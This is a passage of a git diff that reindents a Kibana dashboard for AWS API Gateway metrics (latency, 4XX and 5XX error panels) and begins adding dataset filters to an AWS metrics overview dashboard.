"aws.apigateway.metrics.IntegrationLatency.avg", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.IntegrationLatency.avg" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {} - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "CURVE_MONOTONE_X", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + } + ], + "relation": "AND", + "type": "combined" }, - "valueLabels": "hide" + "query": {} } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "CURVE_MONOTONE_X", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "11242c77-c1e8-482f-a8ab-d14342367450" + ], + "layerId": "ff2c6fd1-df0b-409d-a7e7-033a129edba3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "f87d2d15-ecd3-4cf3-85e5-911976418f35", + "xAccessor": "21bcc448-3bbc-4949-8471-40e126445935" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - "enhancements": {}, - "hidePanelTitles": false + "title": "", + "type": "lens", + "visualizationType": "lnsXY" }, - "title": "Integration Latency" + "enhancements": {}, + "hidePanelTitles": false }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "1c8bb14c-861c-4681-923f-85ec02c508ee", - "w": 24, - "x": 0, - "y": 37 - }, - "panelIndex": "1c8bb14c-861c-4681-923f-85ec02c508ee", - "embeddableConfig": { - "attributes": { - "title": "", - "description": "", - "visualizationType": "lnsXY", - "type": "lens", - "references": [ - { - "type": "index-pattern", - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5e9706cb-90ee-4f08-af6a-f2a8048628af" - } - ], - "state": { - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "cd10361b-ce2e-454c-8612-6be186ffefac" - ], - "layerId": "5e9706cb-90ee-4f08-af6a-f2a8048628af", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "c0d552ba-af46-4959-a9f9-be4bfcb553ec", - "xAccessor": "688be07c-0c70-400a-a931-6abee54ce8e6" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yTitle": "" + "title": "Integration Latency" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "1c8bb14c-861c-4681-923f-85ec02c508ee", + "w": 24, + "x": 0, + "y": 37 + }, + "panelIndex": "1c8bb14c-861c-4681-923f-85ec02c508ee", + "embeddableConfig": { + "attributes": { + "title": "", + "description": "", + "visualizationType": "lnsXY", + "type": "lens", + "references": [ + { + "type": "index-pattern", + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5e9706cb-90ee-4f08-af6a-f2a8048628af" + } + ], + "state": { + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "query": { - "language": "kuery", - "query": "" + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "filters": [ + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.4xx.sum", - "key": "aws.apigateway.metrics.4xx.sum", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.4xx.sum" - } - }, - "$state": { - "store": "appState" + "accessors": [ + "cd10361b-ce2e-454c-8612-6be186ffefac" + ], + "layerId": "5e9706cb-90ee-4f08-af6a-f2a8048628af", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "c0d552ba-af46-4959-a9f9-be4bfcb553ec", + "xAccessor": "688be07c-0c70-400a-a931-6abee54ce8e6" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yTitle": "" + }, + "query": { + "language": "kuery", + "query": "" + }, + "filters": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.4xx.sum", + "key": "aws.apigateway.metrics.4xx.sum", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.4xx.sum" } }, - { - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "$state": { + "store": "appState" + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {}, - "$state": { - "store": "appState" - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {}, + "$state": { + "store": "appState" } - ], - "datasourceStates": { - "formBased": { - "layers": { - "5e9706cb-90ee-4f08-af6a-f2a8048628af": { - "columnOrder": [ - "c0d552ba-af46-4959-a9f9-be4bfcb553ec", - "688be07c-0c70-400a-a931-6abee54ce8e6", - "cd10361b-ce2e-454c-8612-6be186ffefac" - ], - "columns": { - "688be07c-0c70-400a-a931-6abee54ce8e6": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" + } + ], + "datasourceStates": { + "formBased": { + "layers": { + "5e9706cb-90ee-4f08-af6a-f2a8048628af": { + "columnOrder": [ + "c0d552ba-af46-4959-a9f9-be4bfcb553ec", + "688be07c-0c70-400a-a931-6abee54ce8e6", + "cd10361b-ce2e-454c-8612-6be186ffefac" + ], + "columns": { + "688be07c-0c70-400a-a931-6abee54ce8e6": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "c0d552ba-af46-4959-a9f9-be4bfcb553ec": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "cd10361b-ce2e-454c-8612-6be186ffefac", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 + "scale": "interval", + "sourceField": "@timestamp" + }, + "c0d552ba-af46-4959-a9f9-be4bfcb553ec": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "cd10361b-ce2e-454c-8612-6be186ffefac", + "type": "column" }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - }, - "cd10361b-ce2e-454c-8612-6be186ffefac": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of aws.apigateway.metrics.4xx.sum per second", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 0 - } - } + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.4xx.sum", - "timeScale": "s" - } + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" }, - "incompleteColumns": {}, - "sampling": 1 - } + "cd10361b-ce2e-454c-8612-6be186ffefac": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of aws.apigateway.metrics.4xx.sum per second", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.4xx.sum", + "timeScale": "s" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "internalReferences": [], - "adHocDataViews": {} - } - }, - "enhancements": {}, - "hidePanelTitles": false + } + }, + "internalReferences": [], + "adHocDataViews": {} + } }, - "title": "4XX Error" + "enhancements": {}, + "hidePanelTitles": false }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "1a3ffddd-99ee-4555-b092-94984db3de9e", - "w": 24, - "x": 24, - "y": 37 - }, - "panelIndex": "1a3ffddd-99ee-4555-b092-94984db3de9e", - "embeddableConfig": { - "attributes": { - "title": "", - "description": "", - "visualizationType": "lnsXY", - "type": "lens", - "references": [ - { - "type": "index-pattern", - "id": "metrics-*", - "name": "indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" - } - ], - "state": { - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "53bb15bf-1d19-4aaa-be68-5015b194e60b" - ], - "layerId": "da960427-d6bb-4f17-a5ac-9be25356186a", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", - "xAccessor": "7af933af-8c3e-47b8-9e15-9cd504966672" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yTitle": "" + "title": "4XX Error" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "1a3ffddd-99ee-4555-b092-94984db3de9e", + "w": 24, + "x": 24, + "y": 37 + }, + "panelIndex": "1a3ffddd-99ee-4555-b092-94984db3de9e", + "embeddableConfig": { + "attributes": { + "title": "", + "description": "", + "visualizationType": "lnsXY", + "type": "lens", + "references": [ + { + "type": "index-pattern", + "id": "metrics-*", + "name": "indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" + } + ], + "state": { + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "query": { - "language": "kuery", - "query": "" + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "filters": [ + "layers": [ { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.apigateway.metrics.5xx.sum", - "key": "aws.apigateway.metrics.5xx.sum", - "negate": false, - "type": "exists" - }, - "query": { - "exists": { - "field": "aws.apigateway.metrics.5xx.sum" - } - }, - "$state": { - "store": "appState" + "accessors": [ + "53bb15bf-1d19-4aaa-be68-5015b194e60b" + ], + "layerId": "da960427-d6bb-4f17-a5ac-9be25356186a", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", + "xAccessor": "7af933af-8c3e-47b8-9e15-9cd504966672" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yTitle": "" + }, + "query": { + "language": "kuery", + "query": "" + }, + "filters": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.apigateway.metrics.5xx.sum", + "key": "aws.apigateway.metrics.5xx.sum", + "negate": false, + "type": "exists" + }, + "query": { + "exists": { + "field": "aws.apigateway.metrics.5xx.sum" } }, - { - "meta": { - "alias": null, - "disabled": false, - "negate": false, - "params": [ - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.ApiId", - "index": "metrics-*", - "key": "aws.dimensions.ApiId", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.ApiId" - } + "$state": { + "store": "appState" + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.ApiId", + "index": "metrics-*", + "key": "aws.dimensions.ApiId", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.ApiId" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Stage", + "index": "metrics-*", + "key": "aws.dimensions.Stage", + "negate": false, + "type": "exists", + "value": "exists" }, - { - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Stage", - "index": "metrics-*", - "key": "aws.dimensions.Stage", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Stage" - } + "query": { + "exists": { + "field": "aws.dimensions.Stage" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Method", - "index": "metrics-*", - "key": "aws.dimensions.Method", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Method" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Method", + "index": "metrics-*", + "key": "aws.dimensions.Method", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Method" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Resource", - "index": "metrics-*", - "key": "aws.dimensions.Resource", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Resource" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Resource", + "index": "metrics-*", + "key": "aws.dimensions.Resource", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Resource" } + } + }, + { + "$state": { + "store": "appState" }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "aws.dimensions.Route", - "index": "metrics-*", - "key": "aws.dimensions.Route", - "negate": true, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "aws.dimensions.Route" - } + "meta": { + "alias": null, + "disabled": false, + "field": "aws.dimensions.Route", + "index": "metrics-*", + "key": "aws.dimensions.Route", + "negate": true, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "aws.dimensions.Route" } } - ], - "relation": "AND", - "type": "combined" - }, - "query": {}, - "$state": { - "store": "appState" - } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {}, + "$state": { + "store": "appState" } - ], - "datasourceStates": { - "formBased": { - "layers": { - "da960427-d6bb-4f17-a5ac-9be25356186a": { - "columnOrder": [ - "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", - "7af933af-8c3e-47b8-9e15-9cd504966672", - "53bb15bf-1d19-4aaa-be68-5015b194e60b" - ], - "columns": { - "53bb15bf-1d19-4aaa-be68-5015b194e60b": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of aws.apigateway.metrics.5xx.sum", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 0 - } + } + ], + "datasourceStates": { + "formBased": { + "layers": { + "da960427-d6bb-4f17-a5ac-9be25356186a": { + "columnOrder": [ + "c6eaba88-8446-4a94-b32b-e0f6cc784fc2", + "7af933af-8c3e-47b8-9e15-9cd504966672", + "53bb15bf-1d19-4aaa-be68-5015b194e60b" + ], + "columns": { + "53bb15bf-1d19-4aaa-be68-5015b194e60b": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of aws.apigateway.metrics.5xx.sum", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.5xx.sum" + } }, - "7af933af-8c3e-47b8-9e15-9cd504966672": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.5xx.sum" + }, + "7af933af-8c3e-47b8-9e15-9cd504966672": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" }, - "c6eaba88-8446-4a94-b32b-e0f6cc784fc2": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of aws.dimensions.ApiId + 1 other", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "53bb15bf-1d19-4aaa-be68-5015b194e60b", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "aws.dimensions.Stage" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "aws.dimensions.ApiId" - } + "scale": "interval", + "sourceField": "@timestamp" }, - "incompleteColumns": {}, - "sampling": 1 - } + "c6eaba88-8446-4a94-b32b-e0f6cc784fc2": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of aws.dimensions.ApiId + 1 other", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "53bb15bf-1d19-4aaa-be68-5015b194e60b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "aws.dimensions.Stage" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.ApiId" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "internalReferences": [], - "adHocDataViews": {} - } - }, - "enhancements": {}, - "hidePanelTitles": false + } + }, + "internalReferences": [], + "adHocDataViews": {} + } }, - "title": "5XX Error" - } + "enhancements": {}, + "hidePanelTitles": false + }, + "title": "5XX Error" + } ], "timeRestore": false, "title": "[Metrics AWS] API Gateway HTTP Overview", @@ -1996,62 +1996,62 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "7c57d40d-fc76-48d5-a436-55a498d56910:indexpattern-datasource-layer-14e551f8-dfa7-437b-ac75-0e196533af38", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "d5eaca19-1beb-4a9b-a357-883fa8890cdf:indexpattern-datasource-layer-14d15e2d-7223-4aae-90e7-0ad8c4ebc71a" - }, - { + }, + { "name": "767af9d0-2434-4b2e-9fbc-e0dba1c293ae:indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "e71f676d-e0d3-40a3-9439-34de613469f4:indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" - }, - { + }, + { "name": "424aa31b-dcf7-4bde-8dc7-97f9fcf2bcc6:indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "name": "21ea8ee2-05f0-4a71-a46a-fe4ab6c3db94:indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "1c8bb14c-861c-4681-923f-85ec02c508ee:indexpattern-datasource-layer-5e9706cb-90ee-4f08-af6a-f2a8048628af" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "1a3ffddd-99ee-4555-b092-94984db3de9e:indexpattern-datasource-layer-da960427-d6bb-4f17-a5ac-9be25356186a" - }, - { + }, + { "name": "controlGroup_4c6977b0-40b7-4e35-9e86-cc87582fbf75:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "controlGroup_792f0941-104f-4b25-9f8f-bcd22ac55e5f:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "controlGroup_85812c5e-349a-4cdc-a443-3389f87bd41b:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - } + } ], "type": "dashboard" } \ No newline at end of file diff --git a/packages/aws/kibana/dashboard/aws-fac28650-7349-11e9-816b-07687310a99a.json b/packages/aws/kibana/dashboard/aws-fac28650-7349-11e9-816b-07687310a99a.json index 67bdff7ebf27..ff6905b94318 100644 --- a/packages/aws/kibana/dashboard/aws-fac28650-7349-11e9-816b-07687310a99a.json +++ b/packages/aws/kibana/dashboard/aws-fac28650-7349-11e9-816b-07687310a99a.json @@ -9,7 +9,189 @@ "description": "Overview of AWS Metrics", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": "Only metrics data", + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.type", + "negate": false, + "params": { + "query": "metrics" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.type": "metrics" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "aws.apigateway_metrics", + "aws.billing", + "aws.cloudwatch_metrics", + "aws.dynamodb", + "aws.ebs", + "aws.ec2_metrics", + "aws.ecs_metrics", + "aws.elb_metrics", + "aws.emr_metrics", + "aws.firewall_metrics", + "aws.kinesis", + "aws.lambda", + "aws.natgateway", + "aws.rds", + "aws.redshift", + "aws.s3_daily_storage", + "aws.s3_request", + "aws.s3_storage_lens", + "aws.sns", + "aws.sqs", + "aws.transitgateway", + "aws.usage", + "aws.vpn" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "aws.apigateway_metrics" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.billing" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.cloudwatch_metrics" + } + }, + { + "match_phrase": { + 